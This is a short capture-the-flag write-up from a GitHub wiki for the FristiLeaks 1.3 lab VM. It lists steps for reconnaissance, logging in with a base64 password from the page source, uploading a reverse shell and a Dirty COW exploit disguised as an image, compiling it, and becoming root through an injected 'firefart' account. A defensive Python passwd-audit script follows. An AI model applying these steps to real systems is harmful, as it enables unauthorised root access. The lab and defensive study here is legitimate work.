FristiLeaks 1.3 writeup - PacketMonkey22/boot2roots GitHub Wiki

nmap -A -T4 -p- $ip

Apache running

dirb -- bunch of drink names

tried a bunch of names including vm name - /fristi page

source code has comment with name and a base64 image

base64 was password

signed in

--- https://www.exploit-db.com/exploits/40839 ---

uploaded cow.png, which is just the above script, to uploads.

uploaded reverse shell

made nc

ran this: gcc /var/www/html/fristi/uploads/cow.png -o sploit -pthread -lcrypt

ran this: /var/www/html/fristi/uploads/sploit -- made password test

waited five minutes

created new nc

cd /home

firefart exists and is root

python -c 'import pty;pty.spawn("/bin/bash")'

su firefart

test

am root.
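
Seen from the defending side, the end state in these notes (an account named firefart that holds UID 0) is visible in the passwd file itself. The following Python check is an added example, not part of the original writeup or of the linked exploit; the sample entries, the placeholder hash and the function name audit_passwd are constructed for illustration.

```python
# Audit passwd(5)-format text for the end state in the notes above:
# a non-root account holding UID 0, or a hash stored in the
# world-readable passwd file instead of the shadow placeholder.

# Constructed sample; the hash value is a placeholder, not a real crypt string.
SAMPLE_PASSWD = """\
firefart:CONSTRUCTEDHASH00:0:0:pwned:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
admin:x:500:500::/home/admin:/bin/bash
broken line without enough fields
"""

PLACEHOLDERS = {"x", "*", "!", "!!"}  # values meaning "no hash stored here"


def audit_passwd(text):
    """Return a list of (line_number, account, finding) tuples."""
    findings, names = [], set()
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        # A valid entry has seven fields and a numeric UID in the third.
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((lineno, None, "malformed entry"))
            continue
        name, passwd, uid = fields[0], fields[1], int(fields[2])
        names.add(name)
        if uid == 0 and name != "root":
            findings.append((lineno, name, "UID 0 held by non-root account"))
        if passwd == "":
            findings.append((lineno, name, "empty password field"))
        elif passwd not in PLACEHOLDERS:
            findings.append((lineno, name, "hash stored in passwd instead of shadow"))
    # Line number 0 marks a finding about the file as a whole.
    if "root" not in names:
        findings.append((0, "root", "no root entry present"))
    return findings


if __name__ == "__main__":
    for lineno, name, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {finding}")
```

To audit a live host, pass the contents of /etc/passwd to audit_passwd instead of the constructed sample.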